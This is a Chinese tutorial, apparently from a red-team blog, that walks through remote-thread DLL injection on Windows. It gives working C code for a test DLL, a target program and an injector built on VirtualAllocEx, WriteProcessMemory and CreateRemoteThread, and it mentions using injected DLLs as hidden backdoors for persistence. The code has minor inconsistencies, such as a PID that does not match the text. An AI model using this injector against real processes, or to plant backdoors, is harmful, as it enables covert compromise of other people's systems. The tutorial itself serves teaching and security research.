首先简单说一下实现功能:当目标应用程序运行中的状态时,将DLL注入到该目标应用程序内存并执行DLL中的代码。
1. 首先编写我们的DLL
DWORD Threads(LPVOID s){for(;;){Sleep(1000);printf("线程注入OK...n");}}BOOL APIENTRY DllMain( HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){switch(ul_reason_for_call){case DLL_PROCESS_ATTACH:CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)Threads,0,0,NULL);break;}return TRUE;}
当DLL被初次映射到进程的地址空间中时,系统将调用该DLL的DllMain函数,然后创建一个线程,执行Threads这个函数的代码。
2. 编写目标的应用程序
这里通过创建了一个线程,执行fun函数,比较简单
//被执行的代码void fun(){for(int i=0;i<=10;i++){Sleep(1000);printf("Fun()...n");}}DWORD threads(LPVOID s){fun();return 0;}int main(int argc, char* argv[]){HANDLE handle = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)threads,0,0,NULL);getchar();return 0;}
这就是我们目标应用的具体功能
3.进行远程线程注入
首先说一下几个步骤
1.获取进程句柄2.计算dll名字3.给目标进程申请空间4.拷贝dll进去5.获取模块地址6.获取函数地址7.创建远程线程 加载dll8.关闭句柄
加载DLL的话,肯定是要用到LoadLibrary函数进行加载,而这个函数在kernel32.dll 这个dll里面。而exe文件都会包含这个dll的,就属于系统提供的。
代码如下:
//注入代码如下
void LoadDll(DWORD Did,char* pathname){//1.获取进程句柄HANDLE hprocess = OpenProcess(PROCESS_ALL_ACCESS,NULL,Did);//2.计算dll名字DWORD dwlength = strlen(pathname)+1;//3.给目标进程申请空间LPSTR FileRemote = (LPSTR)VirtualAllocEx(hprocess,NULL,dwlength,MEM_COMMIT,PAGE_READWRITE);//4.拷贝dll进去WriteProcessMemory(hprocess,(LPVOID)FileRemote,(LPVOID)pathname,dwlength,NULL);//5.获取模块地址HMODULE hkernel = GetModuleHandle("Kernel32.dll");//6.获取函数地址DWORD loadaddr =(DWORD)GetProcAddress(hkernel,"LoadLibraryA");//7.创建远程线程 加载dllDWORD threadID;HANDLE t = CreateRemoteThread(hprocess,NULL,0,(LPTHREAD_START_ROUTINE)loadaddr,(LPVOID)FileRemote,0,&threadID);//8.关闭句柄CloseHandle(t);}int main(int argc, char* argv[]){LoadDll(14144,"C:\Users\Administrator\Desktop\ASD.dll");//PID和DLLprintf("按下回车终止n");getchar();return 0;}
可以看到我们的PID是22484,这里也可以完全自动获取PID,懒得写了
当我们运行我们的远程线程注入后,可以看到目标进程执行了我们注入进去的DLL代码,为此注入成功!
当然在权限维持的时候,有的DLL被写成后门注入进去,这样更不易发现。
本文始发于微信公众号(渗透攻击红队):远程线程进行DLL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论